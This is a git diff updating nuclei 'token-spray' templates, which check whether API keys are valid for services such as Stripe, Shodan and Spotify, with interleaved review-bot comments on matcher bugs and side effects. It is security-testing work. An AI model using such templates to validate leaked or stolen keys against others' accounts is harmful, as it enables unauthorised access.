a/nuclei-templates/Other/api-scraperbox.yaml b/nuclei-templates/Other/api-scraperbox.yaml index 9befe631ca..b43ab27672 100644 --- a/nuclei-templates/Other/api-scraperbox.yaml +++ b/nuclei-templates/Other/api-scraperbox.yaml @@ -8,10 +8,13 @@ info: reference: - https://scraperbox.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scraperbox + metadata: + max-request: 1 tags: token-spray,scraperbox self-contained: true -requests: + +http: - method: GET path: - "https://api.scraperbox.com/scrape?token={{token}}&url=https://example.com" 
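Review bot: api-scanii-488.yaml authenticates with `{{base64(api + ':' + secret)}}`, i.e. it expects a variable named `api`, whereas the other Basic-auth templates in this patch (api-petfinder.yaml, api-stytch.yaml) pair `{{secret}}` with `{{id}}`. A run that supplies `id`/`secret` will most likely leave the expression unresolved or send an empty username here and report a false negative. Since this file is newly added, aligning on `{{base64(id + ':' + secret)}}` is cheap now; the `-487` to `-488` rename otherwise only changes the reference URL.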
@@ -26,3 +29,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4a0a0047304502207f36a4754fda5d47376179286a5929f95ecb39833d01276df125df4cbd5b3712022100e471d820cf8e65b92617364b2126738d2dcefb072e6073ae15af81d922a347f2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scrapestack.yaml b/nuclei-templates/Other/api-scrapestack.yaml index b2f5e37dc0..0d41190b96 100644 --- a/nuclei-templates/Other/api-scrapestack.yaml +++ b/nuclei-templates/Other/api-scrapestack.yaml @@ -8,10 +8,13 @@ info: reference: - https://scrapestack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapestack + metadata: + max-request: 1 tags: token-spray,scrapestack self-contained: true -requests: + +http: - method: GET path: - "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://example.com" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4b0a00483046022100eac15c431eb927c4e320c9e035ceca60c466be6beca8cf895164f574c60216a1022100ff782e772cac1246805653374e5809e611e222b90840b47d3ff64ebd78365124:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scrapingant.yaml b/nuclei-templates/Other/api-scrapingant.yaml index 98d0a00d43..f89f273a75 100644 --- a/nuclei-templates/Other/api-scrapingant.yaml +++ b/nuclei-templates/Other/api-scrapingant.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.scrapingant.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingant + metadata: + max-request: 1 tags: token-spray,scrapingant self-contained: true -requests: + +http: - raw: - | POST https://api.scrapingant.com/v1/general HTTP/1.1 @@ -29,3 +32,5 @@ requests: - '"cookies"' - '"status_code"' condition: and + +# digest: 490a0046304402200e65aa9c4e1e016b9b98eee1d51f0a6a711ad509ecf9beb4ca46be64a4daa19d02201f4dd5c3cea44569d06979e257bcf3cfbe8567bb5d1858b57028be0dd9f274aa:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-scrapingdog.yaml b/nuclei-templates/Other/api-scrapingdog.yaml index d3522c8d8d..c0fb60e2a6 100644 --- a/nuclei-templates/Other/api-scrapingdog.yaml +++ b/nuclei-templates/Other/api-scrapingdog.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.scrapingdog.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/scrapingdog + metadata: + max-request: 1 tags: token-spray,scrapingdog self-contained: true -requests: + +http: - method: GET path: - "https://api.scrapingdog.com/scrape?api_key={{token}}&url=https://example.com/ip&dynamic=false" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 4a0a004730450220070eb4b2cd00c50767f563586787b1f6304b7e36b924a320e78560f2ea986d3c022100bdb5b45c07be8ce1634abb44332599ac65233926aae0df73b06eb8de5eaea960:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-screenshotapi.yaml b/nuclei-templates/Other/api-screenshotapi.yaml index 0c6d238794..5851a4dcb3 100644 --- a/nuclei-templates/Other/api-screenshotapi.yaml +++ b/nuclei-templates/Other/api-screenshotapi.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.screenshotapi.net/?ref=webflow - https://github.com/daffainfo/all-about-apikey/tree/main/screenshot-api + metadata: + max-request: 1 tags: token-spray,screenshotapi self-contained: true -requests: + +http: - method: GET path: - "https://shot.screenshotapi.net/screenshot?token={{token}}&url=https://example.com" @@ -31,3 +34,5 @@ requests: - 401 - 400 negative: true + +# digest: 490a00463044022068c08d9876d73e8181765fd57562d760a4114651d93979f971482cc92ea2298902206e89c0c4f3ef9094331bb64b3335fe5e3a94c9c24d0d603634b6077515e43a1a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-securitytrails.yaml b/nuclei-templates/Other/api-securitytrails.yaml index a378b4a3bb..d097f86c9b 100644 --- a/nuclei-templates/Other/api-securitytrails.yaml +++ b/nuclei-templates/Other/api-securitytrails.yaml 
@@ -8,18 +8,23 @@ info: - https://securitytrails.com - https://docs.securitytrails.com - https://securitytrails.com/corp/api - tags: dns,ssl,recon,securitytrails,token-spray + metadata: + max-request: 1 + tags: recon,securitytrails,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.securitytrails.com/v1/ping + headers: APIKey: "{{token}}" - matchers: - type: word part: body words: - success + +# digest: 490a004630440220776d46c2dcfd5613149208392c8ffdd55892bae59fb3c0f17a8b5ea71a94b1fd02203943d186910d18983cccd6aa1af5f247b0206e8d05426d3622b48101027f57d1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-segment.yaml b/nuclei-templates/Other/api-segment.yaml index 5c95a6ed11..4cd7faa5cf 100644 --- a/nuclei-templates/Other/api-segment.yaml +++ b/nuclei-templates/Other/api-segment.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://reference.segmentapis.com/ + metadata: + max-request: 1 tags: token-spray,segment self-contained: true -requests: + +http: - raw: - | GET https://platform.segmentapis.com/v1beta/workspaces/myworkspace HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"name":' - '"id"' condition: and + +# digest: 4a0a004730450221008e895f72ab2b5caad49f2adea23f2d831a5b49d1fa14c51883eda1551a8790a30220137a80371f75fb0553dc708b87f7ecfede6c3a790b242e76c0be42d0729ed081:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-sendgrid-489.yaml b/nuclei-templates/Other/api-sendgrid-489.yaml index b887b0b7d1..d0d5a48223 100644 --- a/nuclei-templates/Other/api-sendgrid-489.yaml +++ b/nuclei-templates/Other/api-sendgrid-489.yaml @@ -1,12 +1,10 @@ id: api-sendgrid - info: name: Sendgrid API Test author: zzeitlin reference: https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp severity: info tags: token-spray,sendgrid - network: - inputs: - data: "ehlo\r\n" @@ -15,7 +13,6 @@ network: read: 1024 host: - "tls://smtp.sendgrid.net:465" - matchers: - type: word words: 
diff --git a/nuclei-templates/Other/api-sentry.yaml b/nuclei-templates/Other/api-sentry.yaml index f0f802943e..017f674880 100644 --- a/nuclei-templates/Other/api-sentry.yaml +++ b/nuclei-templates/Other/api-sentry.yaml @@ -8,17 +8,22 @@ info: - https://sentry.io - https://docs.sentry.io - https://docs.sentry.io/api/auth + metadata: + max-request: 1 tags: sentry,tracing,tracking,monitoring,token-spray self-contained: true -requests: + +http: - method: GET path: - "https://sentry.io/api/0/projects/" + headers: Authorization: Bearer {{token}} - matchers: - type: status status: - 200 + +# digest: 4a0a0047304502204275c64e6dd711968c80ec90b4a1227527bdd093b5a25d96b9694fde545b53b7022100cf6753f0f673ab5fbed069a4da5f0f29eae9a39f7d299d0ae269917bc505e3e5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-serpstack.yaml b/nuclei-templates/Other/api-serpstack.yaml index c394ad0050..cd34acd409 100644 --- a/nuclei-templates/Other/api-serpstack.yaml +++ b/nuclei-templates/Other/api-serpstack.yaml @@ -8,10 +8,13 @@ info: reference: - https://serpstack.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/serpstack + metadata: + max-request: 1 tags: token-spray,serpstack self-contained: true -requests: + +http: - method: GET path: - "http://api.serpstack.com/search?access_key={{token}}&query=mcdonalds" @@ -24,3 +27,5 @@ requests: - '"processed_timestamp"' - '"search_url"' condition: and + +# digest: 4b0a00483046022100e5617e9467eec0004b8d5ea61213affe2e734dafc39987060335cac985f98fc802210094a842acbd2bef636f7cfc866b7bbedce5382b4275849325412479831a6cc1c4:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-shodan.yaml b/nuclei-templates/Other/api-shodan.yaml index aec184fcca..a68d0ca1c5 100644 --- a/nuclei-templates/Other/api-shodan.yaml +++ b/nuclei-templates/Other/api-shodan.yaml 
@@ -10,10 +10,13 @@ info: - https://shodan.io - https://developer.shodan.io - https://developer.shodan.io/api - tags: dns,scan,recon,shodan,token-spray + metadata: + max-request: 1 + tags: recon,shodan,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.shodan.io/api-info?key={{token}} @@ -26,3 +29,5 @@ requests: - '"unlocked"' - '"scan_credits"' condition: and + +# digest: 4b0a00483046022100864b75407975119df732a8e145fe6bbaf86ed26d7bc337d63fcdcd9d3c5fd4d8022100a7c5f073f7b4eb64fba8c9ea12494df3197d42a4457a8cffc36b54bb4c62a75a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-spotify-495.yaml b/nuclei-templates/Other/api-spotify-495.yaml deleted file mode 100644 index 2ccc098209..0000000000 --- a/nuclei-templates/Other/api-spotify-495.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: api-spotify - -info: - name: Spotify API Test - author: zzeitlin - reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ - severity: info - tags: token-spray,spotify - -requests: - - method: GET - path: - - "https://api.spotify.com/v1/me" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/api-spotify.yaml b/nuclei-templates/Other/api-spotify.yaml new file mode 100644 index 0000000000..ee518e36b4 --- /dev/null +++ b/nuclei-templates/Other/api-spotify.yaml @@ -0,0 +1,25 @@ +id: api-spotify + +info: + name: Spotify API Test + author: zzeitlin + severity: info + reference: https://developer.spotify.com/documentation/general/guides/authorization-guide/ + tags: token-spray,spotify + +self-contained: true +requests: + - method: GET + path: + - "https://api.spotify.com/v1/me/player/devices" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - '"devices":' + - '"id":' + - '"is_active":' + condition: and \ No newline at end of file 
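Review bot: The new api-spotify.yaml requires `"devices":`, `"id":` and `"is_active":` to all appear (`condition: and`), but a valid token whose account has no registered playback device returns an empty `devices` list, so `"id"` and `"is_active"` are absent and the live key is reported as invalid. The deleted api-spotify-495.yaml tested `/v1/me` with a 200 status, which does not depend on device state; matching on `"devices":` alone, or keeping `/v1/me` with a word match on a profile field, avoids the false negative.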
diff --git a/nuclei-templates/Other/api-square-496.yaml b/nuclei-templates/Other/api-square-496.yaml deleted file mode 100644 index 7ccb835189..0000000000 --- a/nuclei-templates/Other/api-square-496.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-square - -info: - name: Square API Test - author: zzeitlin - reference: https://developer.squareup.com/explorer/square/locations-api/list-locations - severity: info - tags: token-spray,square - -self-contained: true -requests: - - method: GET - path: - - "https://connect.squareup.com/v2/locations" - - "https://connect.squareupsandbox.com/v2/locations" - headers: - Content-Type: application/json - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'errors' - negative: true diff --git a/nuclei-templates/Other/api-square.yaml b/nuclei-templates/Other/api-square.yaml new file mode 100644 index 0000000000..f90e538715 --- /dev/null +++ b/nuclei-templates/Other/api-square.yaml @@ -0,0 +1,21 @@ +id: api-square +info: + name: Square API Test + author: zzeitlin + reference: https://developer.squareup.com/explorer/square/locations-api/list-locations + severity: info + tags: token-spray,square +requests: + - method: GET + path: + - "https://connect.squareup.com/v2/locations" + - "https://connect.squareupsandbox.com/v2/locations" + headers: + Content-Type: application/json + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'errors' + negative: true diff --git a/nuclei-templates/Other/api-strava.yaml b/nuclei-templates/Other/api-strava-498.yaml similarity index 100% rename from nuclei-templates/Other/api-strava.yaml rename to nuclei-templates/Other/api-strava-498.yaml diff --git a/nuclei-templates/Other/api-stripe.yaml b/nuclei-templates/Other/api-stripe.yaml index 16e358e75a..d06b38bd8c 100644 --- a/nuclei-templates/Other/api-stripe.yaml +++ b/nuclei-templates/Other/api-stripe.yaml 
@@ -3,10 +3,11 @@ id: api-stripe info: name: Stripe API Test author: zzeitlin - reference: https://stripe.com/docs/api/authentication severity: info + reference: https://stripe.com/docs/api/authentication tags: token-spray,stripe +self-contained: true requests: - method: GET path: @@ -15,6 +16,10 @@ requests: Authorization: Basic {{base64(token + ':')}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"object":' + - '"url":' + - '"data":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-stytch-500.yaml b/nuclei-templates/Other/api-stytch-500.yaml deleted file mode 100644 index d410066fa0..0000000000 --- a/nuclei-templates/Other/api-stytch-500.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-stytch - -info: - name: Stytch API Test - author: daffainfo - severity: info - reference: - - https://stytch.com/docs/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/Stytch.md - tags: token-spray,stytch - -self-contained: true -requests: - - raw: - - | - POST https://test.stytch.com/v1/users HTTP/1.1 - Authorization: Basic {{base64(id + ':' + secret)}} - Host: test.stytch.com - Content-Type: application/json - - {"email": "test@stytch.com"} - - matchers: - - type: word - part: body - words: - - '"status_code":' - - '"request_id":' - - '"user_id":' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-stytch.yaml b/nuclei-templates/Other/api-stytch.yaml new file mode 100644 index 0000000000..37caf808d3 --- /dev/null +++ b/nuclei-templates/Other/api-stytch.yaml 
@@ -0,0 +1,31 @@ +id: api-stytch + +info: + name: Stytch API Test + author: daffainfo + severity: info + description: User infrastructure for modern applications + reference: + - https://stytch.com/docs/api + - https://github.com/daffainfo/all-about-apikey/tree/main/stytch + tags: token-spray,stytch + +self-contained: true +requests: + - raw: + - | + POST https://test.stytch.com/v1/users HTTP/1.1 + Authorization: Basic {{base64(id + ':' + secret)}} + Host: test.stytch.com + Content-Type: application/json + + {"email": "test@stytch.com"} + + matchers: + - type: word + part: body + words: + - '"status_code":' + - '"request_id":' + - '"user_id":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-supportivekoala.yaml b/nuclei-templates/Other/api-supportivekoala.yaml index e6a5ad91e1..863b7e4b64 100644 --- a/nuclei-templates/Other/api-supportivekoala.yaml +++ b/nuclei-templates/Other/api-supportivekoala.yaml @@ -8,10 +8,13 @@ info: reference: - https://developers.supportivekoala.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/supportivekoala + metadata: + max-request: 1 tags: token-spray,supportivekoala self-contained: true -requests: + +http: - raw: - | GET https://api.supportivekoala.com/v1/images HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"template"' - '"imageUrl"' condition: and + +# digest: 4a0a00473045022022025c3d0dbb1fb08ea5a1a40150fbc1ba81b59905cd75ed20fe499fdd34fcd7022100affab5c34426b3741ed793826c03a586fdd02d68893c9e27ed63798f871c1173:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-tatum.yaml b/nuclei-templates/Other/api-tatum.yaml index e90ee49a68..a70b9c19be 100644 --- a/nuclei-templates/Other/api-tatum.yaml +++ b/nuclei-templates/Other/api-tatum.yaml 
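Review bot: The credential check in api-stytch.yaml is a mutating call — `POST https://test.stytch.com/v1/users` with `{"email": "test@stytch.com"}` creates a user record every time the template fires, so a spray run leaves artifacts in the account under test and may count against quotas. If Stytch exposes a read-only endpoint that also validates the project id/secret pair it would be the safer probe; otherwise a `description` sentence stating that the check creates a test user should be added. Unlike the neighbouring templates in this commit, this one is still keyed as `requests:` and has no `metadata: max-request: 1`.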
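Review bot: The `# digest:` comment appended at the end of api-supportivekoala.yaml (and the other templates in this commit that gain one) appears to be the nuclei template signature, which covers the template body; the text was presumably copied with the upstream content, so any local edit after this point leaves the digest stale. Since a stale signature can lead the loader to treat the template as unsigned, the digest should be regenerated, or dropped, whenever a file is changed by hand in this repository.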
@@ -7,22 +7,36 @@ info: reference: - https://apidoc.tatum.io/#tag/Node-RPC - https://docs.tatum.io + metadata: + max-request: 1 tags: defi,dapp,token-spray,blockchain self-contained: true -requests: - - method: POST - path: - - "https://api-eu1.tatum.io/v3/blockchain/node/ETH/{{token}}" - headers: - Content-Type: application/json - body: "{\"jsonrpc\":\"2.0\",\"method\":\"web3_clientVersion\",\"params\":[ ],\"id\":1}" +http: + - raw: + - | + GET https://api.tatum.io/v3/tatum/version HTTP/1.1 + Host: api.tatum.io + x-api-key: {{token}} + + matchers-condition: and matchers: - type: word part: body words: - - '"id":' - - '"result":' - - '"jsonrpc":' + - '"baseCommit":' + - '"planName":' + - '"creditLimit":' condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022022f3c9377b666df77d20e15cc981191ea36af68adbfe7466a38d378b739d05d3022100f7a594ab9933abff01150ef1e6eab59084a932cbb361185c4a4f72c4cbca27d1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-thecatapi-502.yaml b/nuclei-templates/Other/api-thecatapi-502.yaml index c6e1d0d1a8..0eb02cde29 100644 --- a/nuclei-templates/Other/api-thecatapi-502.yaml +++ b/nuclei-templates/Other/api-thecatapi-502.yaml @@ -4,9 +4,10 @@ info: name: TheCatApi API Test author: daffainfo severity: info + description: Pictures of cats from Tumblr reference: - https://docs.thecatapi.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/TheCatApi.md + - https://github.com/daffainfo/all-about-apikey/tree/main/thecatapi tags: token-spray,thecatapi self-contained: true diff --git a/nuclei-templates/Other/api-ticketmaster.yaml b/nuclei-templates/Other/api-ticketmaster.yaml index 8780f43111..dff940016e 100644 --- a/nuclei-templates/Other/api-ticketmaster.yaml +++ b/nuclei-templates/Other/api-ticketmaster.yaml 
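Review bot: The tags line in api-tatum.yaml still reads `defi,dapp,token-spray,blockchain` although the probe no longer touches a blockchain node endpoint; it now calls `GET https://api.tatum.io/v3/tatum/version` with `x-api-key`, so `token-spray,tatum` describes it more accurately. Moving the key out of the URL path (`/node/ETH/{{token}}` in the removed lines) into a header is an improvement worth keeping, since path components end up in proxy and server access logs.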
@@ -2,19 +2,22 @@ id: api-ticketmaster info: name: Ticket Master API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://developer.ticketmaster.com/products-and-docs/apis/getting-started/ metadata: verified: true + max-request: 1 tags: token-spray,ticketmaster self-contained: true -requests: + +http: - method: GET path: - "https://app.ticketmaster.com/discovery/v2/events.json?apikey={{token}}" + matchers: - type: word part: body @@ -24,3 +27,5 @@ requests: - '"type"' - '"images"' condition: and + +# digest: 490a004630440220418e96a4c2a83a3ebae9ee186be2fb5fb4679c61ce9fad325ebac05e1f3a1bd602206fe6e80783c71977b9d2b1d90a909b29f96a06e9ae1084fc8fac3e18bcdad6b5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-tink-504.yaml b/nuclei-templates/Other/api-tink.yaml similarity index 100% rename from nuclei-templates/Other/api-tink-504.yaml rename to nuclei-templates/Other/api-tink.yaml diff --git a/nuclei-templates/Other/api-tinypng-505.yaml b/nuclei-templates/Other/api-tinypng-505.yaml index 922e62848b..2cc913788a 100644 --- a/nuclei-templates/Other/api-tinypng-505.yaml +++ b/nuclei-templates/Other/api-tinypng-505.yaml @@ -1,19 +1,16 @@ id: api-tinypng - info: name: TinyPNG API Test author: zzeitlin reference: https://tinypng.com/developers severity: info tags: token-spray,tinypng - requests: - method: POST path: - "https://api.tinify.com/shrink" headers: Authorization: Basic {{base64('api:' + token)}} - matchers: - type: word part: header diff --git a/nuclei-templates/Other/api-todoist.yaml b/nuclei-templates/Other/api-todoist.yaml index 55897d1626..67b54a6ec4 100644 --- a/nuclei-templates/Other/api-todoist.yaml +++ b/nuclei-templates/Other/api-todoist.yaml 
@@ -8,10 +8,13 @@ info: reference: - https://developer.todoist.com/rest/v1/#overview - https://github.com/daffainfo/all-about-apikey/tree/main/todoist + metadata: + max-request: 1 tags: token-spray,todoist self-contained: true -requests: + +http: - raw: - | GET https://api.todoist.com/rest/v1/projects HTTP/1.1 @@ -26,3 +29,5 @@ requests: - "color" - "name" condition: and + +# digest: 490a0046304402203dbef347f1a662b07de6be4819a80425658784c023602c004abe26aeaf09e5e602205d2622dc6c1cfa6baa62ba5034f1509620b7eaeec485f8429096f5a4f62f7fb2:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-twitter-507.yaml b/nuclei-templates/Other/api-twitter.yaml similarity index 100% rename from nuclei-templates/Other/api-twitter-507.yaml rename to nuclei-templates/Other/api-twitter.yaml diff --git a/nuclei-templates/Other/api-urlscan-508.yaml b/nuclei-templates/Other/api-urlscan.yaml similarity index 100% rename from nuclei-templates/Other/api-urlscan-508.yaml rename to nuclei-templates/Other/api-urlscan.yaml diff --git a/nuclei-templates/Other/api-userstack.yaml b/nuclei-templates/Other/api-userstack.yaml index 3cbd93b795..2ee0e8f92d 100644 --- a/nuclei-templates/Other/api-userstack.yaml +++ b/nuclei-templates/Other/api-userstack.yaml @@ -2,14 +2,17 @@ id: api-userstack info: name: User Stack API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://userstack.com/documentation + metadata: + max-request: 1 tags: token-spray,userstack self-contained: true -requests: + +http: - method: GET path: - "http://api.userstack.com/api/detect?access_key={{token}}&ua=Mozilla/5.0%20(Macintosh;%20Intel%20Mac%20OS%20X%2010_14_0)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/71.0.3578.98%20Safari/537.36" 
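Review bot: The api-userstack.yaml probe sends `access_key={{token}}` over plain `http://api.userstack.com`, so the credential being validated travels in cleartext and lands in the query-string portion of every intermediate access log. If the API accepts TLS for the key under test, change the scheme to `https://`; if the plan tier forces plaintext, a one-line comment above the path saying so will stop the next reviewer from re-raising it. The file's second hunk on the following line only adds the digest.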
@@ -22,3 +25,5 @@ requests: - '"name":' - '"brand":' condition: and + +# digest: 4a0a00473045022100da6c0f5774aa06e11b62a466787e94d1fd56fb971809160cef77d19ebba9134402207aa065ee1fe9dfe11535a427db1c7c5585ff8e62b3b37f73e8df6060a3b611af:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-vercel.yaml b/nuclei-templates/Other/api-vercel-510.yaml similarity index 100% rename from nuclei-templates/Other/api-vercel.yaml rename to nuclei-templates/Other/api-vercel-510.yaml diff --git a/nuclei-templates/Other/api-virustotal-512.yaml b/nuclei-templates/Other/api-virustotal-512.yaml new file mode 100644 index 0000000000..fbcb6e2600 --- /dev/null +++ b/nuclei-templates/Other/api-virustotal-512.yaml @@ -0,0 +1,30 @@ +id: api-virustotal + +info: + name: VirusTotal API Test + author: daffainfo + severity: info + reference: + - https://developers.virustotal.com/reference + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md + tags: token-spray,virustotal + +self-contained: true +requests: + - raw: + - | + POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 + Host: www.virustotal.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 86 + + apikey={{token}}&url=google.com + + matchers: + - type: word + part: body + words: + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" + condition: and diff --git a/nuclei-templates/Other/api-virustotal.yaml b/nuclei-templates/Other/api-virustotal.yaml deleted file mode 100644 index f48595c162..0000000000 --- a/nuclei-templates/Other/api-virustotal.yaml +++ /dev/null 
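Review bot: The raw request in api-virustotal-512.yaml hard-codes `Content-Length: 86`, which is only correct when `{{token}}` is exactly 64 characters (7 bytes for `apikey=`, 15 for `&url=google.com`); any other key length yields a malformed request, and since nuclei normally computes the length of raw bodies itself the header can simply be dropped. The matcher words `'verbose_msg':`, `'scan_date':` and `'permalink':` are single-quoted, Python-dict style; if the endpoint answers in JSON those keys are double-quoted and the template never matches, so this should be verified against a real response. Note also that the probe submits a URL for scanning, i.e. it has a side effect beyond validating the key, which the `description` should mention.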
@@ -1,30 +0,0 @@ -id: api-virustotal - -info: - name: VirusTotal API Test - author: daffainfo - severity: info - reference: - - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - tags: token-spray,virustotal - -self-contained: true -requests: - - raw: - - | - POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 - Host: www.virustotal.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 86 - - apikey={{token}}&url=google.com - - matchers: - - type: word - part: body - words: - - "'verbose_msg':" - - "'scan_date':" - - "'permalink':" - condition: and diff --git a/nuclei-templates/Other/visualstudio.yaml b/nuclei-templates/Other/api-visualstudio-513.yaml similarity index 100% rename from nuclei-templates/Other/visualstudio.yaml rename to nuclei-templates/Other/api-visualstudio-513.yaml diff --git a/nuclei-templates/Other/wakatime.yaml b/nuclei-templates/Other/api-wakatime-514.yaml similarity index 100% rename from nuclei-templates/Other/wakatime.yaml rename to nuclei-templates/Other/api-wakatime-514.yaml diff --git a/nuclei-templates/Other/api-wordnik.yaml b/nuclei-templates/Other/api-wordnik.yaml index dfe89ce8f9..64a1eb4943 100644 --- a/nuclei-templates/Other/api-wordnik.yaml +++ b/nuclei-templates/Other/api-wordnik.yaml @@ -8,10 +8,13 @@ info: reference: - https://developer.wordnik.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/wordnik + metadata: + max-request: 1 tags: token-spray,wordnik self-contained: true -requests: + +http: - method: GET path: - "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"year"' - '"rating"' condition: and + +# digest: 4a0a0047304502201a2b6d2fad91ea3333bb61b78fa75652fcfff29a2a2c572fe64051e4abb5344e0221009d26ccdedcec37c3d3a8937a3c3c7f36d82010a1ad27f391afe5aaec78d6d5cf:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-youtube.yaml b/nuclei-templates/Other/api-youtube-519.yaml similarity index 100% rename from nuclei-templates/Other/api-youtube.yaml rename to nuclei-templates/Other/api-youtube-519.yaml diff --git a/nuclei-templates/Other/api-zenrows.yaml b/nuclei-templates/Other/api-zenrows.yaml index 9f25423c48..5707079f74 100644 --- a/nuclei-templates/Other/api-zenrows.yaml +++ b/nuclei-templates/Other/api-zenrows.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.zenrows.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/zenrows + metadata: + max-request: 1 tags: token-spray,zenrows self-contained: true -requests: + +http: - method: GET path: - "https://api.zenrows.com/v1/?apikey={{token}}&url=https://example.com" @@ -21,3 +24,5 @@ requests: part: body words: - 'Example Domain' + +# digest: 490a00463044022053400d85ec2ff13f0c35b64bcadd50ad94e1a5dd83e8ee17fc28a0fba7da62cc022032c0210f12b83c7ebe8bd917a35c833b82ad629aa4e67377438baa7f4b673765:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-zerbounce.yaml b/nuclei-templates/Other/api-zerbounce.yaml index 3871e85054..e8abbb1821 100644 --- a/nuclei-templates/Other/api-zerbounce.yaml +++ b/nuclei-templates/Other/api-zerbounce.yaml @@ -2,19 +2,22 @@ id: api-zerobounce info: name: Zerobounce API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://www.zerobounce.net/docs/email-validation-api-quickstart metadata: verified: true + max-request: 1 tags: token-spray,zerobounce self-contained: true -requests: + +http: - method: GET path: - "https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12" + matchers: - type: word part: body 
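Review bot: The file is named api-zerbounce.yaml while its `id` is `api-zerobounce` and its tag is `zerobounce`; the misspelling in the path predates this hunk, but since the commit already renames many siblings, renaming this one to `api-zerobounce.yaml` would keep id and filename aligned and make the template findable by its id. The hunk content itself (author change, `max-request: 1`, `http:`) is fine.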
@@ -23,3 +26,5 @@ requests: - '"start_date":' - '"end_date":' condition: and + +# digest: 4a0a0047304502206c18cf5d42e12eb3f3510a1863d447afabb0217911c4a51f69f9f65157a1d90d022100da8e42f7a75dd698c83e5318ba0fcf6fefb3ecdf023d40ce08c39eeda8f5d18e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-zoomeye.yaml b/nuclei-templates/Other/api-zoomeye.yaml index b0c0d64dd8..900591a027 100644 --- a/nuclei-templates/Other/api-zoomeye.yaml +++ b/nuclei-templates/Other/api-zoomeye.yaml @@ -9,16 +9,19 @@ info: reference: - https://zoomeye.org - https://zoomeye.org/doc - tags: dns,scan,recon,zoomeye,token-spray + metadata: + max-request: 1 + tags: recon,zoomeye,token-spray self-contained: true -requests: + +http: - method: GET path: - https://api.zoomeye.org/resources-info + headers: API-KEY: "{{token}}" - matchers: - type: word part: body @@ -27,3 +30,5 @@ requests: - '"stats"' - '"user_info"' condition: and + +# digest: 4a0a0047304502206372862f53fdb27dd7c0ac2c9927ac79c749a8a519ec0337d0073c90839571ad02210090d942a707d0c70e51a42dea9ebac861a7e68846a6a97a290915cb4f75863cf5:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/apigee-panel.yaml b/nuclei-templates/Other/apigee-panel.yaml index 20f33c6936..bd38bff268 100644 --- a/nuclei-templates/Other/apigee-panel.yaml 